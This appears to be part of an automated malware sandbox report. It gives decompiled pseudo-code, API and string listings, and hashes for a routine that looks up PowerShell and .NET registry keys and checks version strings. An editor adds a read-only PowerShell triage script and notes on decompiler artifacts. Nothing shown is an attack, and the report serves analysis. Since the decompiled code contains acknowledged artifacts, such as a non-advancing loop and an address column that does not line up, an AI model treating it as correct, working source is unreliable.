												_t184 = RegQueryValueExW(_v68, L"NetFrameworkV4IsInstalled", _t247, _t247, _t247,  &_v60); // executed
												if(_t184 == 0) {
													_t186 = _v60 >> 1;
													_t244 = _t186 * 2 >> 0x20;
													_t236 =  ~(0 | __eflags > 0x00000000) | _t186 * 0x00000002;
													_t188 = E0125972E(_t236);
													_t268 = _t268 + 4;
													_v48 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														memset(_t188, 0, _v60);
														_t268 = _t268 + 0xc;
														_t191 = RegQueryValueExW(_v68, L"NetFrameworkV4IsInstalled", 0, 0, _v48,  &_v60);
														__eflags = _t191;
														if(_t191 == 0) {
															_t192 = wcsncmp(_v48, L"No", 2);
															_t268 = _t268 + 0xc;
															__eflags = _t192;
															if(_t192 == 0) {
																_t193 =  *0x12606dc; // 0x3403de0
																_t247 = 0xffff0000;
																_t261 =  *( *_t193 + 4);
																_t236 = _t261;
																 *0x1261204(_t193, 0, 3, _v72, _v88);
																 *_t261();
																_t257 = _v44;
																_t268 = _t268 + 0x14;
															}
														}
													} else {
														_t247 = 0xffff0000;
													}
												}
											}
											L34:
											_t179 = _v68;
											if(_t179 != 0) {
												RegCloseKey(_t179);
												_v68 = 0;
											}
											_t180 = _v64;
											if(_t180 != 0) {
												free(_t180);
												_t268 = _t268 + 4;
											}
											_t181 = _v48;
											if(_t181 != 0) {
												free(_t181);
												_t268 = _t268 + 4;
											}
											if(_t247 != 0) {
												_t227 = _v80;
											} else {
												_push(_v96);
												_push(_a4);
												_push(_t229);
												_t227 = _v80;
												_push(_t236);
												_push(_t227);
												_push(_v72);
												_push(_v92);
												L01257B60(); // executed
												_t247 = _t181;
											}
											_t166 = _v76;
											L42:
											if(_t166 != 0) {
												free(_t166);
												_t268 = _t268 + 4;
											}
											if(_t227 != 0) {
												free(_t227);
												_t268 = _t268 + 4;
											}
											if(_v37 != 0) {
												free(_t257);
											}
                                                                                                                                                                                                                              											goto L47;
                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                              										__imp___itow_s(_v52,  &_v32, 0xb, 0xa);
                                                                                                                                                                                                                              										_t268 = _t268 + 0x10;
                                                                                                                                                                                                                              										_v56 = 0;
                                                                                                                                                                                                                              										_v52 = 0;
                                                                                                                                                                                                                              										if(E01259200(_t257) != 0 || 0 == _v32) {
                                                                                                                                                                                                                              											_t247 = 0xfffb0000;
                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                              											_t216 = E012590D0(0x12606d0, L"SOFTWARE\\Microsoft\\PowerShell\\%1!ls!",  &_v56,  &_v100, 0x17,  &_v32);
                                                                                                                                                                                                                              											_t268 = _t268 + 0x18;
                                                                                                                                                                                                                              											_t217 = _v56;
                                                                                                                                                                                                                              											if(_t216 == 0) {
                                                                                                                                                                                                                              												_t247 = 0xfffb0000;
                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                              												_t236 =  &_v52;
                                                                                                                                                                                                                              												_t220 = RegOpenKeyExW(0x80000002, _t217, 0, 0x20019, _t236); // executed
                                                                                                                                                                                                                              												if(_t220 != 0) {
                                                                                                                                                                                                                              													_t110 = _t220 - 2; // -2
                                                                                                                                                                                                                              													_t221 =  *0x12606d4; // 0x0
                                                                                                                                                                                                                              													asm("sbb edi, edi");
                                                                                                                                                                                                                              													_t247 = ( ~_t110 & 0x00010000) + 0xfffa0000;
                                                                                                                                                                                                                              													_t266 =  *( *_t221 + 4);
                                                                                                                                                                                                                              													_t236 = _t266;
                                                                                                                                                                                                                              													 *0x1261204(_t221, 0, 0x19, _v44);
                                                                                                                                                                                                                              													 *_t266();
                                                                                                                                                                                                                              													_t257 = _v44;
                                                                                                                                                                                                                              													_t268 = _t268 + 0x10;
                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                              												_t217 = _v56;
                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                              											if(_t217 != 0) {
                                                                                                                                                                                                                              												free(_t217);
                                                                                                                                                                                                                              												_t268 = _t268 + 4;
                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                              											_t218 = _v52;
                                                                                                                                                                                                                              											if(_t218 != 0) {
                                                                                                                                                                                                                              												RegCloseKey(_t218);
                                                                                                                                                                                                                              												_v52 = 0;
                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                              										if(_t247 != 0) {
                                                                                                                                                                                                                              											goto L34;
                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                              											_t202 = E012590D0(0x12606d0, L"SOFTWARE\\Microsoft\\PowerShell\\%1!ls!\\PowerShellEngine",  &_v36,  &_v100, 0x17,  &_v32);
                                                                                                                                                                                                                              											_t268 = _t268 + 0x18;
                                                                                                                                                                                                                              											if(_t202 == 0) {
                                                                                                                                                                                                                              												goto L75;
                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                              											_t204 = RegOpenKeyExW(0x80000002, _v36, _t247, 0x20019,  &_v68); // executed
                                                                                                                                                                                                                              											_t236 = _t204;
                                                                                                                                                                                                                              											if(_t236 != 0) {
                                                                                                                                                                                                                              												__eflags = _t236 - 2;
                                                                                                                                                                                                                              												if(__eflags != 0) {
                                                                                                                                                                                                                              													_t249 =  *0x12606d4; // 0x0
                                                                                                                                                                                                                              													 *0x1261204(_t236, 0x14, _v36);
                                                                                                                                                                                                                              													_t236 = _t249;
                                                                                                                                                                                                                              													 *((intOrPtr*)( *((intOrPtr*)( *_t249 + 8))))();
                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                              													_t208 =  *0x12606d4; // 0x0
                                                                                                                                                                                                                              													_t264 =  *( *_t208 + 4);
                                                                                                                                                                                                                              													_t236 = _t264;
                                                                                                                                                                                                                              													 *0x1261204(_t208, 0, 0x27, _v36, _v44);
                                                                                                                                                                                                                              													 *_t264();
                                                                                                                                                                                                                              													_t268 = _t268 + 0x14;
                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                              												_t257 = _v44;
                                                                                                                                                                                                                              												goto L75;
                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                              												_v64 = _v36;
                                                                                                                                                                                                                              												goto L32;
                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							L6:
                                                                                                                                                                                                                              							_v36 = 3;
                                                                                                                                                                                                                              							goto L7;
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              						goto L56;
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					_t234 = _v36;
                                                                                                                                                                                                                              					if(_t234 == 2) {
                                                                                                                                                                                                                              						_v36 = 1;
                                                                                                                                                                                                                              						goto L7;
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              			}
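The decompiled routine above opens HKLM\SOFTWARE\Microsoft\PowerShell\<version> and then its PowerShellEngine subkey read-only (RegOpenKeyExW with HKEY_LOCAL_MACHINE and KEY_READ), which is the lookup a PowerShell host performs to find the installed engine rather than anything specific to the dropped payload. The following PowerShell snippet is an added example written for this report page, not code from the sample or from Joe Sandbox, that performs the same two lookups on an analysis host so the registry activity in the report can be compared with a clean baseline. The value names it reads (PowerShellVersion, RuntimeVersion) are the documented values under PowerShellEngine and are an assumption here, since the fragment does not show which values the routine queries.

```powershell
# Added example: reproduce the registry lookups seen in the decompiled routine.
# Editor-written triage code, not part of the sample or the sandbox report.
# The routine opens HKLM\SOFTWARE\Microsoft\PowerShell\<n> (0x80000002 = HKEY_LOCAL_MACHINE,
# 0x20019 = KEY_READ) and then <n>\PowerShellEngine. The value names below are an
# assumption; the fragment only shows the key opens, not which values are read.
function Get-PowerShellEngineKeys {
    $base = 'HKLM:\SOFTWARE\Microsoft\PowerShell'
    if (-not (Test-Path -Path $base)) {
        # Mirrors the routine's ERROR_FILE_NOT_FOUND (2) branch: no engine registered at all.
        return @()
    }
    Get-ChildItem -Path $base | ForEach-Object {
        $version   = $_.PSChildName
        $engineKey = Join-Path -Path $base -ChildPath "$version\PowerShellEngine"
        if (Test-Path -Path $engineKey) {
            $p = Get-ItemProperty -Path $engineKey
            [pscustomobject]@{
                VersionKey        = $version
                EngineKeyPresent  = $true
                PowerShellVersion = $p.PowerShellVersion
                RuntimeVersion    = $p.RuntimeVersion
            }
        } else {
            # <n> exists but <n>\PowerShellEngine does not: the second RegOpenKeyExW in the
            # routine would fail here with ERROR_FILE_NOT_FOUND.
            [pscustomobject]@{
                VersionKey        = $version
                EngineKeyPresent  = $false
                PowerShellVersion = $null
                RuntimeVersion    = $null
            }
        }
    }
}

Get-PowerShellEngineKeys | Format-Table -AutoSize
```

Run this on the analysis VM image before detonation; if the keys and values match what the sandbox recorded for the spawned process, the registry reads in this function are host start-up behaviour and not an indicator on their own.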
Instruction addresses from the report's disassembly column for this function (extracted as a separate column, so they no longer line up with the decompiled lines above):
0x0125845b 0x01258462 0x01258466 0x0125846c 0x0125846f 0x01258476 0x0125847d 0x01258484 0x0125848b 0x01258492 0x012584a0 0x012584a9 0x012584b3 0x0125ab95 0x0125ab9a 0x0125aba6 0x0125aba6 0x0125ab9a 0x012584b3 0x012584c3 0x012584ce 0x012584d9 0x012584e4 0x012584ef 0x012584fa 0x01258505 0x0125850c 0x01258511 0x01258515 0x0125879e 0x0125879e 0x012587a5 0x012587bf 0x012587bf 0x012587b8 0x0125851b 0x0125851b 0x01258530 0x01258538 0x0125abb3
                                                                                                                                                                                                                              0x0125abb9
                                                                                                                                                                                                                              0x0125abbc
                                                                                                                                                                                                                              0x0125abbf
                                                                                                                                                                                                                              0x0125abca
                                                                                                                                                                                                                              0x0125abca
                                                                                                                                                                                                                              0x0125abd8
                                                                                                                                                                                                                              0x0125abdf
                                                                                                                                                                                                                              0x0125abec
                                                                                                                                                                                                                              0x0125abf2
                                                                                                                                                                                                                              0x0125879d
                                                                                                                                                                                                                              0x0125879d
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125879d
                                                                                                                                                                                                                              0x0125abc1
                                                                                                                                                                                                                              0x0125abc4
                                                                                                                                                                                                                              0x0125854a
                                                                                                                                                                                                                              0x0125854d
                                                                                                                                                                                                                              0x0125ac08
                                                                                                                                                                                                                              0x0125ac0b
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125855a
                                                                                                                                                                                                                              0x0125855a
                                                                                                                                                                                                                              0x01258560
                                                                                                                                                                                                                              0x0125ac16
                                                                                                                                                                                                                              0x01258566
                                                                                                                                                                                                                              0x01258566
                                                                                                                                                                                                                              0x01258566
                                                                                                                                                                                                                              0x0125857e
                                                                                                                                                                                                                              0x01258583
                                                                                                                                                                                                                              0x01258586
                                                                                                                                                                                                                              0x0125858a
                                                                                                                                                                                                                              0x0125ade7
                                                                                                                                                                                                                              0x0125adea
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258590
                                                                                                                                                                                                                              0x01258590
                                                                                                                                                                                                                              0x01258595
                                                                                                                                                                                                                              0x0125ac1f
                                                                                                                                                                                                                              0x0125ac1f
                                                                                                                                                                                                                              0x0125859b
                                                                                                                                                                                                                              0x012585a0
                                                                                                                                                                                                                              0x0125ac26
                                                                                                                                                                                                                              0x0125ac26
                                                                                                                                                                                                                              0x012585a6
                                                                                                                                                                                                                              0x012585ab
                                                                                                                                                                                                                              0x0125ac2d
                                                                                                                                                                                                                              0x0125ac2d
                                                                                                                                                                                                                              0x012585b1
                                                                                                                                                                                                                              0x012585b6
                                                                                                                                                                                                                              0x0125ac34
                                                                                                                                                                                                                              0x012585bc
                                                                                                                                                                                                                              0x012585bc
                                                                                                                                                                                                                              0x012585bc
                                                                                                                                                                                                                              0x012585c3
                                                                                                                                                                                                                              0x012585c6
                                                                                                                                                                                                                              0x012585cb
                                                                                                                                                                                                                              0x0125ac40
                                                                                                                                                                                                                              0x0125ac4d
                                                                                                                                                                                                                              0x0125ac50
                                                                                                                                                                                                                              0x0125ac52
                                                                                                                                                                                                                              0x0125ac58
                                                                                                                                                                                                                              0x0125ac5d
                                                                                                                                                                                                                              0x0125ac60
                                                                                                                                                                                                                              0x012585d1
                                                                                                                                                                                                                              0x012585d4
                                                                                                                                                                                                                              0x012585d7
                                                                                                                                                                                                                              0x012585d7
                                                                                                                                                                                                                              0x012585da
                                                                                                                                                                                                                              0x012585dd
                                                                                                                                                                                                                              0x012585e1
                                                                                                                                                                                                                              0x012585e4
                                                                                                                                                                                                                              0x012585eb
                                                                                                                                                                                                                              0x012585ee
                                                                                                                                                                                                                              0x012585f1
                                                                                                                                                                                                                              0x012585f4
                                                                                                                                                                                                                              0x012585f9
                                                                                                                                                                                                                              0x0125ac7d
                                                                                                                                                                                                                              0x0125ac82
                                                                                                                                                                                                                              0x0125ac85
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012585ff
                                                                                                                                                                                                                              0x01258600
                                                                                                                                                                                                                              0x0125860a
                                                                                                                                                                                                                              0x0125ad27
                                                                                                                                                                                                                              0x0125ad27
                                                                                                                                                                                                                              0x01258706
                                                                                                                                                                                                                              0x01258708
                                                                                                                                                                                                                              0x01258719
                                                                                                                                                                                                                              0x01258721
                                                                                                                                                                                                                              0x0125ad36
                                                                                                                                                                                                                              0x0125ad3d
                                                                                                                                                                                                                              0x0125ad44
                                                                                                                                                                                                                              0x0125ad47
                                                                                                                                                                                                                              0x0125ad4c
                                                                                                                                                                                                                              0x0125ad4f
                                                                                                                                                                                                                              0x0125ad52
                                                                                                                                                                                                                              0x0125ad54
                                                                                                                                                                                                                              0x0125ad66
                                                                                                                                                                                                                              0x0125ad6b
                                                                                                                                                                                                                              0x0125ad81
                                                                                                                                                                                                                              0x0125ad87
                                                                                                                                                                                                                              0x0125ad89
                                                                                                                                                                                                                              0x0125ad99
                                                                                                                                                                                                                              0x0125ad9f
                                                                                                                                                                                                                              0x0125ada2
                                                                                                                                                                                                                              0x0125ada4
                                                                                                                                                                                                                              0x0125adad
                                                                                                                                                                                                                              0x0125adb2
                                                                                                                                                                                                                              0x0125adc1
                                                                                                                                                                                                                              0x0125adc4
                                                                                                                                                                                                                              0x0125adc6
                                                                                                                                                                                                                              0x0125adcc
                                                                                                                                                                                                                              0x0125adce
                                                                                                                                                                                                                              0x0125add1
                                                                                                                                                                                                                              0x0125add1
                                                                                                                                                                                                                              0x0125ada4
                                                                                                                                                                                                                              0x0125ad56

APIs
• SetThreadUILanguage.KERNELBASE(00000000,00000000,?), ref: 01258492
  • Part of subcall function 012595A0: memset.MSVCRT ref: 012595F5
  • Part of subcall function 012595A0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 01259618
  • Part of subcall function 012595A0: VerSetConditionMask.KERNEL32(00000000), ref: 01259620
  • Part of subcall function 012595A0: VerSetConditionMask.KERNEL32(00000000), ref: 01259628
  • Part of subcall function 012595A0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 01259653
• GetStartupInfoW.KERNEL32(?), ref: 012584A9
• RegOpenKeyExW.KERNELBASE(80000002,SYSTEM\CurrentControlSet\Control\MiniNT,00000000,00020019,FFFFFFFF,?,00000000,FFFFFFFF,FFFFFFFF,FFFFFFFF,00000000,?,00000000,?,?), ref: 01258530
• _itow_s.MSVCRT ref: 0125861B
• RegOpenKeyExW.KERNELBASE(80000002,FFFFFFFF,00000000,00020019,00000003,?,?,?,?,?,00000000), ref: 0125867F
• free.MSVCRT(FFFFFFFF,?,?,?,?,?,00000000), ref: 01258695
• RegCloseKey.ADVAPI32(00000003,?,?,?,?,?,00000000), ref: 012586A5
• RegOpenKeyExW.KERNELBASE(80000002,00000002,00000000,00020019,00000000), ref: 012586F0
• RegQueryValueExW.KERNELBASE(00000000,NetFrameworkV4IsInstalled,00000000,00000000,00000000,00000000), ref: 01258719
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 0125872F
                                                                                                                                                                                                                              • free.MSVCRT(FFFFFFFF,?,?,?,?,?,00000000), ref: 01258744
                                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,?,00000000), ref: 01258786
                                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,?,00000000), ref: 01258795
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,FFFFFFFF,FFFFFFFF,FFFFFFFF,00000000,?,00000000,?,?), ref: 012587BF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • SYSTEM\CurrentControlSet\Control\MiniNT, xrefs: 01258526
                                                                                                                                                                                                                              • Start, xrefs: 01257F9F
                                                                                                                                                                                                                              • SOFTWARE\Microsoft\PowerShell\%1!ls!, xrefs: 01258652
                                                                                                                                                                                                                              • SOFTWARE\Microsoft\PowerShell\%1!ls!\PowerShellEngine, xrefs: 012586C4
                                                                                                                                                                                                                              • wks, xrefs: 01257C02
                                                                                                                                                                                                                              • NetFrameworkV4IsInstalled, xrefs: 01258711, 0125AD79
                                                                                                                                                                                                                              • Microsoft.PowerShell.UnmanagedPSEntry, xrefs: 01257E33
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$ConditionMaskOpen$CloseInfo$FreeLanguageLibraryQueryStartupThreadValueVerifyVersion_itow_smemset
                                                                                                                                                                                                                              • String ID: Microsoft.PowerShell.UnmanagedPSEntry$NetFrameworkV4IsInstalled$SOFTWARE\Microsoft\PowerShell\%1!ls!$SOFTWARE\Microsoft\PowerShell\%1!ls!\PowerShellEngine$SYSTEM\CurrentControlSet\Control\MiniNT$Start$wks
                                                                                                                                                                                                                              • API String ID: 1592770027-3807573465
                                                                                                                                                                                                                              • Opcode ID: b58177662dd652ff1eaaaa967d964241f1c72bc3a5efa5ce9e9da13e69208484
                                                                                                                                                                                                                              • Instruction ID: aad9c9824e687b739c03aff1b68c6070e379495aa5d59ecf934915b47fc1b40d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b58177662dd652ff1eaaaa967d964241f1c72bc3a5efa5ce9e9da13e69208484
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3F19071E20209ABDF65DFA9DC85BEEBBB8EF48311F044119EE11B7294D7B0A845CB50
                                                                                                                                                                                                                              Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 69%
E01258850(void** _a4, void** _a8, intOrPtr _a12, void* _a16, void* _a24) {
	signed int _v8;
	char _v32;
	intOrPtr _v44;
	wchar_t* _v48;
	wchar_t* _v52;
	char _v53;
	short _v60;
	wchar_t* _v64;
	wchar_t* _v68;
	void* _v72;
	void* _v76;
	wchar_t* _v80;
	long _v84;
	void** _v88;
	void** _v92;
	void* _v96;
	void* _v100;
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	signed int _t113;
	void** _t115;
	void* _t116;
	void* _t118;
	void* _t119;
	long _t120;
	intOrPtr* _t126;
	void* _t129;
	void* _t131;
	intOrPtr* _t133;
	wchar_t* _t137;
	long _t142;
	signed int _t145;
	long _t151;
	intOrPtr _t153;
	void* _t154;
	void* _t155;
	intOrPtr* _t156;
	signed int _t159;
	long _t165;
	void* _t167;
	void* _t168;
	void* _t172;
	void* _t174;
	intOrPtr* _t178;
	void* _t187;
	void* _t188;
	void* _t189;
	void* _t191;
	intOrPtr* _t196;
	void* _t201;
	void* _t202;
	void** _t203;
	wchar_t* _t214;
	signed int _t220;
	short _t221;
	wchar_t* _t222;
	wchar_t* _t231;
	signed short* _t232;
	void* _t233;
	intOrPtr* _t234;
	void* _t236;
	wchar_t* _t240;
	intOrPtr* _t245;
	signed int _t248;
	void* _t249;
	void* _t250;

	_t113 =  *0x1260358; // 0xc21f7063
	_v8 = _t113 ^ _t248;
	_t203 = _a4;
	_t115 = _a8;
	_t229 = _a16;
	_t235 = _a24;
	_t202 = 0;
	_t231 = 0;
	_v92 = _t203;
	_v88 = _t115;
	_v96 = _t229;
	_v100 = _t235;
	_v72 = 0;
	_v53 = 1;
	_v80 = 0;
	_v48 = 0;
	if(_t203 == 0 || _t115 == 0 || _t229 == 0 || _t235 == 0) {
		_t116 = 0xfffb0000;
		goto L52;
	} else {
		_t236 =  *_t203;
		_v52 = 0;
		_v60 = _t236;
		if(_t236 != 0) {
			_t229 =  *_t115;
			_v64 = 0;
			_t118 = E01259200(_t236);
                                                                                                                                                                                                                              						__eflags = _t118;
                                                                                                                                                                                                                              						if(_t118 != 0) {
                                                                                                                                                                                                                              							L80:
                                                                                                                                                                                                                              							_t235 = 0xfffb0000;
                                                                                                                                                                                                                              							_v52 = 0xfffb0000;
                                                                                                                                                                                                                              							L6:
                                                                                                                                                                                                                              							if(_t235 != 0) {
                                                                                                                                                                                                                              								_v53 = 0;
                                                                                                                                                                                                                              								L44:
                                                                                                                                                                                                                              								if(_t202 != 0) {
                                                                                                                                                                                                                              									free(_t202);
                                                                                                                                                                                                                              									_t249 = _t249 + 4;
                                                                                                                                                                                                                              									_t202 = 0;
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              								if(_t231 != 0) {
                                                                                                                                                                                                                              									free(_t231);
                                                                                                                                                                                                                              									_t249 = _t249 + 4;
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              								if(_v53 == 0) {
                                                                                                                                                                                                                              									L51:
                                                                                                                                                                                                                              									_t116 = _t235;
                                                                                                                                                                                                                              									goto L52;
                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                              									_t119 = _v72;
                                                                                                                                                                                                                              									if(_t119 == 0) {
                                                                                                                                                                                                                              										goto L51;
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              									_t120 = RegCloseKey(_t119); // executed
                                                                                                                                                                                                                              									if(_t120 != 0) {
                                                                                                                                                                                                                              										_v60 = 0;
                                                                                                                                                                                                                              										_t235 = FormatMessageW(0x1100, 0, _t120, 0,  &_v60, 0, 0);
                                                                                                                                                                                                                              										__eflags = _t235;
                                                                                                                                                                                                                              										if(_t235 != 0) {
                                                                                                                                                                                                                              											_t101 = _t235 + 1; // 0x1
                                                                                                                                                                                                                              											_t229 = _t101 * 2 >> 0x20;
                                                                                                                                                                                                                              											_t231 = E0125972E( ~(0 | __eflags > 0x00000000) | _t101 * 0x00000002);
                                                                                                                                                                                                                              											_t250 = _t249 + 4;
                                                                                                                                                                                                                              											__eflags = _t231;
                                                                                                                                                                                                                              											if(_t231 != 0) {
                                                                                                                                                                                                                              												_t109 = _t235 + 1; // 0x1
                                                                                                                                                                                                                              												_t229 = _t109;
                                                                                                                                                                                                                              												_t129 = E0125CE50(_t231, _t109, _v60);
                                                                                                                                                                                                                              												__eflags = _t129;
                                                                                                                                                                                                                              												if(_t129 < 0) {
                                                                                                                                                                                                                              													_t235 = 0;
                                                                                                                                                                                                                              													free(_t231);
                                                                                                                                                                                                                              													_t250 = _t250 + 4;
                                                                                                                                                                                                                              													_t231 = 0;
                                                                                                                                                                                                                              													__eflags = 0;
                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                              											LocalFree(_v60);
                                                                                                                                                                                                                              											__eflags = _t235;
                                                                                                                                                                                                                              											if(_t235 != 0) {
                                                                                                                                                                                                                              												_t126 =  *0x12606d4; // 0x0
                                                                                                                                                                                                                              												_t235 =  *( *_t126 + 4);
                                                                                                                                                                                                                              												 *0x1261204(_t126, 0, 0x15, _t202, _t231);
                                                                                                                                                                                                                              												 *( *( *_t126 + 4))();
                                                                                                                                                                                                                              												__eflags = _t231;
                                                                                                                                                                                                                              												if(_t231 != 0) {
                                                                                                                                                                                                                              													free(_t231);
                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                              										_t116 = _v52;
                                                                                                                                                                                                                              										L52:
                                                                                                                                                                                                                              										return E01259A40(_t116, _t202, _v8 ^ _t248, _t229, _t231, _t235);
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              									goto L51;
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							_t131 = E01258C90(_t202, _v72, L"PowerShellVersion", _t202,  &_v48); // executed
                                                                                                                                                                                                                              							_t231 = _v48;
                                                                                                                                                                                                                              							if(_t131 == 0) {
                                                                                                                                                                                                                              								L85:
                                                                                                                                                                                                                              								_t235 = 0xfffb0000;
                                                                                                                                                                                                                              								L86:
                                                                                                                                                                                                                              								_v52 = _t235;
                                                                                                                                                                                                                              								goto L44;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							if(E01259200(_t231) != 0) {
                                                                                                                                                                                                                              								L84:
                                                                                                                                                                                                                              								_t133 =  *0x12606d4; // 0x0
                                                                                                                                                                                                                              								 *0x1261204(_t133, 0, 0x1b, _t202, L"PowerShellVersion");
                                                                                                                                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t133 + 4))))();
                                                                                                                                                                                                                              								_t249 = _t249 + 0x14;
                                                                                                                                                                                                                              								goto L85;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							_t232 = wcschr(_t231, 0x2e);
                                                                                                                                                                                                                              							_t249 = _t249 + 8;
                                                                                                                                                                                                                              							if(_t232 == 0) {
                                                                                                                                                                                                                              								L83:
                                                                                                                                                                                                                              								_t231 = _v48;
                                                                                                                                                                                                                              								goto L84;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							_t229 =  *_t232 & 0x0000ffff;
                                                                                                                                                                                                                              							_t137 = _v48;
                                                                                                                                                                                                                              							_t214 = _t137;
                                                                                                                                                                                                                              							if(_t229 >= 0x30) {
                                                                                                                                                                                                                              								__eflags = _t229 - 0x39;
                                                                                                                                                                                                                              								if(_t229 > 0x39) {
                                                                                                                                                                                                                              									goto L11;
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              								goto L83;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							L11:
                                                                                                                                                                                                                              							if(_t214 == 0) {
                                                                                                                                                                                                                              								goto L83;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							_t229 = 0;
                                                                                                                                                                                                                              							if(0 ==  *_t137 || _t214 >= _t232) {
                                                                                                                                                                                                                              								goto L83;
} else {
	// first component: skip leading '0' digits up to the '.' found in _t232
	while( *_t214 == 0x30) {
		_t214 =  &(_t214[0]); // decompiler artifact: the compiled loop advances the pointer one UTF-16 unit (&_t214[1]), otherwise it could not terminate
		__eflags = _t214 - _t232;
		if(_t214 < _t232) {
			continue;
		}
		break;
	}
	// byte distance between UTF-16 pointers, masked even: more than 0x14 bytes = more than 10 digits -> reject
	if((_t232 - _t214 & 0xfffffffe) > 0x14) {
		goto L83;
	}
	_v76 = _t229;
	_t142 = wcstoul(_t214,  &_v76, 0xa); // base-10 conversion must stop exactly at the '.' and fit a signed 32-bit int
	_t249 = _t249 + 0xc;
	_v84 = _t142;
	if(_t232 != _v76 || _t142 > 0x7fffffff) {
		goto L83;
	} else {
		_v60 = 0; // index into the local 3-entry array of the remaining components
		while(1) {
			_t240 =  &(_t232[1]);
			_t232 = wcschr(_t240, 0x2e); // next '.'; none left means the last component follows
			_t249 = _t249 + 8;
			if(_t232 == 0) {
				break;
			}
			// the delimiter itself must not be a digit (the same inlined check is reused below for the NUL-terminated last component)
			_t159 =  *_t232 & 0x0000ffff;
			if(_t159 >= 0x30) {
				__eflags = _t159 - 0x39;
				if(_t159 <= 0x39) {
					goto L83;
				}
			}
			// component must be non-empty ("1..2" and "1." fail here)
			if(_t240 == 0 || 0 ==  *_t240 || _t240 >= _t232) {
				goto L83;
			} else {
				while( *_t240 == 0x30) {
					_t240 =  &(_t240[0]); // same decompiler artifact: pointer advances one UTF-16 unit
					__eflags = _t240 - _t232;
					if(_t240 < _t232) {
						continue;
					}
					break;
				}
				if((_t232 - _t240 & 0xfffffffe) > 0x14) {
					goto L83;
				}
				_v68 = 0;
				_t165 = wcstoul(_t240,  &_v68, 0xa);
				_t249 = _t249 + 0xc;
				if(_t232 != _v68 || _t165 > 0x7fffffff) {
					goto L83;
				} else {
					_t220 = _v60;
					 *(_t248 + _t220 * 4 - 0x28) = _t165;
					_t221 = _t220 + 1;
					_v60 = _t221;
					// a '.'-terminated third extra component means five components in total -> reject (max is 4)
					if(_t221 <= 2) {
						continue;
					} else {
						goto L83;
					}
				}
			}
		}
		// last component runs to the NUL terminator
		_t233 = wcschr(_t240, 0);
		_t249 = _t249 + 8;
		__eflags = _t233;
		if(_t233 == 0) {
			goto L83;
		}
		_t145 =  *_t233 & 0x0000ffff;
		__eflags = _t145 - 0x30;
		if(_t145 >= 0x30) {
			__eflags = _t145 - 0x39;
			if(_t145 <= 0x39) {
				goto L83;
			}
		}
		__eflags = _t240;
		if(_t240 == 0) {
			goto L83;
		}
		__eflags = 0 -  *_t240;
		if(0 ==  *_t240) {
			goto L83;
		}
		__eflags = _t240 - _t233;
		if(_t240 >= _t233) {
			goto L83;
		} else {
			while(1) {
